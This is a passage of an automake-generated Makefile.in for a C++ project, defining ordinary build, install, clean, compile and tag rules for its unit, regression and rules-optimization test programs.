$(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles)'; \ cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles);; \ esac; $(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(am__aclocal_m4_deps): install-binPROGRAMS: $(bin_PROGRAMS) @$(NORMAL_INSTALL) @list='$(bin_PROGRAMS)'; test -n "$(bindir)" || list=; \ if test -n "$$list"; then \ echo " $(MKDIR_P) '$(DESTDIR)$(bindir)'"; \ $(MKDIR_P) "$(DESTDIR)$(bindir)" || exit 1; \ fi; \ for p in $$list; do echo "$$p $$p"; done | \ sed 's/$(EXEEXT)$$//' | \ while read p p1; do if test -f $$p \ || test -f $$p1 \ ; then echo "$$p"; echo "$$p"; else :; fi; \ done | \ sed -e 'p;s,.*/,,;n;h' \ -e 's|.*|.|' \ -e 'p;x;s,.*/,,;s/$(EXEEXT)$$//;$(transform);s/$$/$(EXEEXT)/' | \ sed 'N;N;N;s,\n, ,g' | \ $(AWK) 'BEGIN { files["."] = ""; dirs["."] = 1 } \ { d=$$3; if (dirs[d] != 1) { print "d", d; dirs[d] = 1 } \ if ($$2 == $$4) files[d] = files[d] " " $$1; \ else { print "f", $$3 "/" $$4, $$1; } } \ END { for (d in files) print "f", d, files[d] }' | \ while read type dir files; do \ if test "$$dir" = .; then dir=; else dir=/$$dir; fi; \ test -z "$$files" || { \ echo " $(INSTALL_PROGRAM_ENV) $(LIBTOOL) $(AM_LIBTOOLFLAGS) $(LIBTOOLFLAGS) --mode=install $(INSTALL_PROGRAM) $$files '$(DESTDIR)$(bindir)$$dir'"; \ $(INSTALL_PROGRAM_ENV) $(LIBTOOL) $(AM_LIBTOOLFLAGS) $(LIBTOOLFLAGS) --mode=install $(INSTALL_PROGRAM) $$files "$(DESTDIR)$(bindir)$$dir" || exit $$?; \ } \ ; done uninstall-binPROGRAMS: @$(NORMAL_UNINSTALL) @list='$(bin_PROGRAMS)'; test -n "$(bindir)" || list=; \ files=`for p in $$list; do echo "$$p"; done | \ sed -e 'h;s,^.*/,,;s/$(EXEEXT)$$//;$(transform)' \ -e 's/$$/$(EXEEXT)/' \ `; \ test -n "$$list" || exit 0; \ echo " ( cd '$(DESTDIR)$(bindir)' && rm -f" $$files ")"; \ cd "$(DESTDIR)$(bindir)" && rm -f $$files clean-binPROGRAMS: @list='$(bin_PROGRAMS)'; test -n "$$list" || exit 0; \ echo " rm -f" $$list; \ rm -f $$list || exit $$?; \ test -n "$(EXEEXT)" || exit 0; \ list=`for p in $$list; do echo "$$p"; done | sed 's/$(EXEEXT)$$//'`; \ echo " rm -f" $$list; \ rm -f $$list clean-noinstPROGRAMS: @list='$(noinst_PROGRAMS)'; test -n "$$list" || exit 0; \ echo " rm -f" $$list; \ rm -f $$list || exit $$?; \ test -n "$(EXEEXT)" || exit 0; \ list=`for p in $$list; do echo "$$p"; done | sed 's/$(EXEEXT)$$//'`; \ echo " rm -f" $$list; \ rm -f $$list regression/$(am__dirstamp): @$(MKDIR_P) regression @: > regression/$(am__dirstamp) regression/$(DEPDIR)/$(am__dirstamp): @$(MKDIR_P) regression/$(DEPDIR) @: > regression/$(DEPDIR)/$(am__dirstamp) regression/tests-regression.$(OBJEXT): regression/$(am__dirstamp) \ regression/$(DEPDIR)/$(am__dirstamp) regression/tests-regression_test.$(OBJEXT): \ regression/$(am__dirstamp) \ regression/$(DEPDIR)/$(am__dirstamp) regression/tests-custom_debug_log.$(OBJEXT): \ regression/$(am__dirstamp) \ regression/$(DEPDIR)/$(am__dirstamp) regression_tests$(EXEEXT): $(regression_tests_OBJECTS) $(regression_tests_DEPENDENCIES) $(EXTRA_regression_tests_DEPENDENCIES) @rm -f regression_tests$(EXEEXT) $(AM_V_CXXLD)$(regression_tests_LINK) $(regression_tests_OBJECTS) $(regression_tests_LDADD) $(LIBS) optimization/$(am__dirstamp): @$(MKDIR_P) optimization @: > optimization/$(am__dirstamp) optimization/$(DEPDIR)/$(am__dirstamp): @$(MKDIR_P) optimization/$(DEPDIR) @: > optimization/$(DEPDIR)/$(am__dirstamp) optimization/rules_optimization-optimization.$(OBJEXT): \ optimization/$(am__dirstamp) \ optimization/$(DEPDIR)/$(am__dirstamp) rules_optimization$(EXEEXT): $(rules_optimization_OBJECTS) $(rules_optimization_DEPENDENCIES) $(EXTRA_rules_optimization_DEPENDENCIES) @rm -f rules_optimization$(EXEEXT) $(AM_V_CXXLD)$(rules_optimization_LINK) $(rules_optimization_OBJECTS) $(rules_optimization_LDADD) $(LIBS) unit/$(am__dirstamp): @$(MKDIR_P) unit @: > unit/$(am__dirstamp) unit/$(DEPDIR)/$(am__dirstamp): @$(MKDIR_P) unit/$(DEPDIR) @: > unit/$(DEPDIR)/$(am__dirstamp) unit/tests-unit.$(OBJEXT): unit/$(am__dirstamp) \ unit/$(DEPDIR)/$(am__dirstamp) unit/tests-unit_test.$(OBJEXT): unit/$(am__dirstamp) \ unit/$(DEPDIR)/$(am__dirstamp) unit_tests$(EXEEXT): $(unit_tests_OBJECTS) $(unit_tests_DEPENDENCIES) $(EXTRA_unit_tests_DEPENDENCIES) @rm -f unit_tests$(EXEEXT) $(AM_V_CXXLD)$(unit_tests_LINK) $(unit_tests_OBJECTS) $(unit_tests_LDADD) $(LIBS) mostlyclean-compile: -rm -f *.$(OBJEXT) -rm -f optimization/*.$(OBJEXT) -rm -f regression/*.$(OBJEXT) -rm -f unit/*.$(OBJEXT) distclean-compile: -rm -f *.tab.c @AMDEP_TRUE@@am__include@ @am__quote@optimization/$(DEPDIR)/rules_optimization-optimization.Po@am__quote@ # am--include-marker @AMDEP_TRUE@@am__include@ @am__quote@regression/$(DEPDIR)/tests-custom_debug_log.Po@am__quote@ # am--include-marker @AMDEP_TRUE@@am__include@ @am__quote@regression/$(DEPDIR)/tests-regression.Po@am__quote@ # am--include-marker @AMDEP_TRUE@@am__include@ @am__quote@regression/$(DEPDIR)/tests-regression_test.Po@am__quote@ # am--include-marker @AMDEP_TRUE@@am__include@ @am__quote@unit/$(DEPDIR)/tests-unit.Po@am__quote@ # am--include-marker @AMDEP_TRUE@@am__include@ @am__quote@unit/$(DEPDIR)/tests-unit_test.Po@am__quote@ # am--include-marker $(am__depfiles_remade): @$(MKDIR_P) $(@D) @echo '# dummy' >$@-t && $(am__mv) $@-t $@ am--depfiles: $(am__depfiles_remade) .cc.o: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.o$$||'`;\ @am__fastdepCXX_TRUE@ $(CXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXXCOMPILE) -c -o $@ $< .cc.obj: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.obj$$||'`;\ @am__fastdepCXX_TRUE@ $(CXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ `$(CYGPATH_W) '$<'` &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXXCOMPILE) -c -o $@ `$(CYGPATH_W) '$<'` .cc.lo: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.lo$$||'`;\ @am__fastdepCXX_TRUE@ $(LTCXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Plo @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=yes @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(LTCXXCOMPILE) -c -o $@ $< regression/tests-regression.o: regression/regression.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(regression_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT regression/tests-regression.o -MD -MP -MF regression/$(DEPDIR)/tests-regression.Tpo -c -o regression/tests-regression.o `test -f 'regression/regression.cc' || echo '$(srcdir)/'`regression/regression.cc @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) regression/$(DEPDIR)/tests-regression.Tpo regression/$(DEPDIR)/tests-regression.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='regression/regression.cc' object='regression/tests-regression.o' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(regression_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o regression/tests-regression.o `test -f 'regression/regression.cc' || echo '$(srcdir)/'`regression/regression.cc regression/tests-regression.obj: regression/regression.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(regression_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT regression/tests-regression.obj -MD -MP -MF regression/$(DEPDIR)/tests-regression.Tpo -c -o regression/tests-regression.obj `if test -f 'regression/regression.cc'; then $(CYGPATH_W) 'regression/regression.cc'; else $(CYGPATH_W) '$(srcdir)/regression/regression.cc'; fi` @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) regression/$(DEPDIR)/tests-regression.Tpo regression/$(DEPDIR)/tests-regression.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='regression/regression.cc' object='regression/tests-regression.obj' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(regression_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o regression/tests-regression.obj `if test -f 'regression/regression.cc'; then $(CYGPATH_W) 'regression/regression.cc'; else $(CYGPATH_W) '$(srcdir)/regression/regression.cc'; fi` regression/tests-regression_test.o: regression/regression_test.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(regression_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT regression/tests-regression_test.o -MD -MP -MF regression/$(DEPDIR)/tests-regression_test.Tpo -c -o regression/tests-regression_test.o `test -f 'regression/regression_test.cc' || echo '$(srcdir)/'`regression/regression_test.cc @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) regression/$(DEPDIR)/tests-regression_test.Tpo regression/$(DEPDIR)/tests-regression_test.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='regression/regression_test.cc' object='regression/tests-regression_test.o' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(regression_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o regression/tests-regression_test.o `test -f 'regression/regression_test.cc' || echo '$(srcdir)/'`regression/regression_test.cc regression/tests-regression_test.obj: regression/regression_test.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(regression_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT regression/tests-regression_test.obj -MD -MP -MF regression/$(DEPDIR)/tests-regression_test.Tpo -c -o regression/tests-regression_test.obj `if test -f 'regression/regression_test.cc'; then $(CYGPATH_W) 'regression/regression_test.cc'; else $(CYGPATH_W) '$(srcdir)/regression/regression_test.cc'; fi` @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) regression/$(DEPDIR)/tests-regression_test.Tpo regression/$(DEPDIR)/tests-regression_test.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='regression/regression_test.cc' object='regression/tests-regression_test.obj' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(regression_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o regression/tests-regression_test.obj `if test -f 'regression/regression_test.cc'; then $(CYGPATH_W) 'regression/regression_test.cc'; else $(CYGPATH_W) '$(srcdir)/regression/regression_test.cc'; fi` regression/tests-custom_debug_log.o: regression/custom_debug_log.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(regression_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT regression/tests-custom_debug_log.o -MD -MP -MF regression/$(DEPDIR)/tests-custom_debug_log.Tpo -c -o regression/tests-custom_debug_log.o `test -f 'regression/custom_debug_log.cc' || echo '$(srcdir)/'`regression/custom_debug_log.cc @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) regression/$(DEPDIR)/tests-custom_debug_log.Tpo regression/$(DEPDIR)/tests-custom_debug_log.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='regression/custom_debug_log.cc' object='regression/tests-custom_debug_log.o' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(regression_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o regression/tests-custom_debug_log.o `test -f 'regression/custom_debug_log.cc' || echo '$(srcdir)/'`regression/custom_debug_log.cc regression/tests-custom_debug_log.obj: regression/custom_debug_log.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(regression_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT regression/tests-custom_debug_log.obj -MD -MP -MF regression/$(DEPDIR)/tests-custom_debug_log.Tpo -c -o regression/tests-custom_debug_log.obj `if test -f 'regression/custom_debug_log.cc'; then $(CYGPATH_W) 'regression/custom_debug_log.cc'; else $(CYGPATH_W) '$(srcdir)/regression/custom_debug_log.cc'; fi` @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) regression/$(DEPDIR)/tests-custom_debug_log.Tpo regression/$(DEPDIR)/tests-custom_debug_log.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='regression/custom_debug_log.cc' object='regression/tests-custom_debug_log.obj' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(regression_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o regression/tests-custom_debug_log.obj `if test -f 'regression/custom_debug_log.cc'; then $(CYGPATH_W) 'regression/custom_debug_log.cc'; else $(CYGPATH_W) '$(srcdir)/regression/custom_debug_log.cc'; fi` optimization/rules_optimization-optimization.o: optimization/optimization.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(rules_optimization_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT optimization/rules_optimization-optimization.o -MD -MP -MF optimization/$(DEPDIR)/rules_optimization-optimization.Tpo -c -o optimization/rules_optimization-optimization.o `test -f 'optimization/optimization.cc' || echo '$(srcdir)/'`optimization/optimization.cc @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) optimization/$(DEPDIR)/rules_optimization-optimization.Tpo optimization/$(DEPDIR)/rules_optimization-optimization.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='optimization/optimization.cc' object='optimization/rules_optimization-optimization.o' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(rules_optimization_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o optimization/rules_optimization-optimization.o `test -f 'optimization/optimization.cc' || echo '$(srcdir)/'`optimization/optimization.cc optimization/rules_optimization-optimization.obj: optimization/optimization.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(rules_optimization_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT optimization/rules_optimization-optimization.obj -MD -MP -MF optimization/$(DEPDIR)/rules_optimization-optimization.Tpo -c -o optimization/rules_optimization-optimization.obj `if test -f 'optimization/optimization.cc'; then $(CYGPATH_W) 'optimization/optimization.cc'; else $(CYGPATH_W) '$(srcdir)/optimization/optimization.cc'; fi` @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) optimization/$(DEPDIR)/rules_optimization-optimization.Tpo optimization/$(DEPDIR)/rules_optimization-optimization.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='optimization/optimization.cc' object='optimization/rules_optimization-optimization.obj' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(rules_optimization_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o optimization/rules_optimization-optimization.obj `if test -f 'optimization/optimization.cc'; then $(CYGPATH_W) 'optimization/optimization.cc'; else $(CYGPATH_W) '$(srcdir)/optimization/optimization.cc'; fi` unit/tests-unit.o: unit/unit.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(unit_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT unit/tests-unit.o -MD -MP -MF unit/$(DEPDIR)/tests-unit.Tpo -c -o unit/tests-unit.o `test -f 'unit/unit.cc' || echo '$(srcdir)/'`unit/unit.cc @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) unit/$(DEPDIR)/tests-unit.Tpo unit/$(DEPDIR)/tests-unit.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='unit/unit.cc' object='unit/tests-unit.o' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(unit_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o unit/tests-unit.o `test -f 'unit/unit.cc' || echo '$(srcdir)/'`unit/unit.cc unit/tests-unit.obj: unit/unit.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(unit_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT unit/tests-unit.obj -MD -MP -MF unit/$(DEPDIR)/tests-unit.Tpo -c -o unit/tests-unit.obj `if test -f 'unit/unit.cc'; then $(CYGPATH_W) 'unit/unit.cc'; else $(CYGPATH_W) '$(srcdir)/unit/unit.cc'; fi` @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) unit/$(DEPDIR)/tests-unit.Tpo unit/$(DEPDIR)/tests-unit.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='unit/unit.cc' object='unit/tests-unit.obj' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(unit_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o unit/tests-unit.obj `if test -f 'unit/unit.cc'; then $(CYGPATH_W) 'unit/unit.cc'; else $(CYGPATH_W) '$(srcdir)/unit/unit.cc'; fi` unit/tests-unit_test.o: unit/unit_test.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(unit_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT unit/tests-unit_test.o -MD -MP -MF unit/$(DEPDIR)/tests-unit_test.Tpo -c -o unit/tests-unit_test.o `test -f 'unit/unit_test.cc' || echo '$(srcdir)/'`unit/unit_test.cc @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) unit/$(DEPDIR)/tests-unit_test.Tpo unit/$(DEPDIR)/tests-unit_test.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='unit/unit_test.cc' object='unit/tests-unit_test.o' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(unit_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o unit/tests-unit_test.o `test -f 'unit/unit_test.cc' || echo '$(srcdir)/'`unit/unit_test.cc unit/tests-unit_test.obj: unit/unit_test.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(unit_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT unit/tests-unit_test.obj -MD -MP -MF unit/$(DEPDIR)/tests-unit_test.Tpo -c -o unit/tests-unit_test.obj `if test -f 'unit/unit_test.cc'; then $(CYGPATH_W) 'unit/unit_test.cc'; else $(CYGPATH_W) '$(srcdir)/unit/unit_test.cc'; fi` @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) unit/$(DEPDIR)/tests-unit_test.Tpo unit/$(DEPDIR)/tests-unit_test.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='unit/unit_test.cc' object='unit/tests-unit_test.obj' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(unit_tests_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o unit/tests-unit_test.obj `if test -f 'unit/unit_test.cc'; then $(CYGPATH_W) 'unit/unit_test.cc'; else $(CYGPATH_W) '$(srcdir)/unit/unit_test.cc'; fi` mostlyclean-libtool: -rm -f *.lo clean-libtool: -rm -rf .libs _libs # This directory's subdirectories are mostly independent; you can cd # into them and run 'make' without going through this Makefile. # To change the values of 'make' variables: instead of editing Makefiles, # (1) if the variable is set in 'config.status', edit 'config.status' # (which will cause the Makefiles to be regenerated when you run 'make'); # (2) otherwise, pass the desired values on the 'make' command line. $(am__recursive_targets): @fail=; \ if $(am__make_keepgoing); then \ failcom='fail=yes'; \ else \ failcom='exit 1'; \ fi; \ dot_seen=no; \ target=`echo $@ | sed s/-recursive//`; \ case "$@" in \ distclean-* | maintainer-clean-*) list='$(DIST_SUBDIRS)' ;; \ *) list='$(SUBDIRS)' ;; \ esac; \ for subdir in $$list; do \ echo "Making $$target in $$subdir"; \ if test "$$subdir" = "."; then \ dot_seen=yes; \ local_target="$$target-am"; \ else \ local_target="$$target"; \ fi; \ ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \ || eval $$failcom; \ done; \ if test "$$dot_seen" = "no"; then \ $(MAKE) $(AM_MAKEFLAGS) "$$target-am" || exit 1; \ fi; test -z "$$fail" ID: $(am__tagged_files) $(am__define_uniq_tagged_files); mkid -fID $$unique tags: tags-recursive TAGS: tags tags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) set x; \ here=`pwd`; \ if ($(ETAGS) --etags-include --version) >/dev/null 2>&1; then \ include_option=--etags-include; \ empty_fix=.; \ else \ include_option=--include; \ empty_fix=; \ fi; \ list='$(SUBDIRS)'; for subdir in $$list; do \ if test "$$subdir" = .; then :; else \ test ! -f $$subdir/TAGS || \ set "$$@" "$$include_option=$$here/$$subdir/TAGS"; \ fi; \ done; \ $(am__define_uniq_tagged_files); \ shift; \ if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \ test -n "$$unique" || unique=$$empty_fix; \ if test $$# -gt 0; then \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ "$$@" $$unique; \ else \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ $$unique; \ fi; \ fi ctags: ctags-recursive CTAGS: ctags ctags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) $(am__define_uniq_tagged_files); \ test -z "$(CTAGS_ARGS)$$unique" \ || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \ $$unique GTAGS: here=`$(am__cd) $(top_builddir) && pwd` \ && $(am__cd) $(top_srcdir) \ && gtags -i $(GTAGS_ARGS) "$$here" cscopelist: cscopelist-recursive cscopelist-am: $(am__tagged_files) list='$(am__tagged_files)'; \ case "$(srcdir)" in \ [\\/]* | ?:[\\/]*) sdir="$(srcdir)" ;; \ *) sdir=$(subdir)/$(srcdir) ;; \ esac; \ for i in $$list; do \ if test -f "$$i"; then \ echo "$(subdir)/$$i"; \ else \ echo "$$sdir/$$i"; \ fi; \ done >> $(top_builddir)/cscope.files distclean-tags: -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags distdir: $(BUILT_SOURCES) $(MAKE) $(AM_MAKEFLAGS) distdir-am distdir-am: $(DISTFILES) @srcdirstrip=`echo "$(srcdir)" | sed 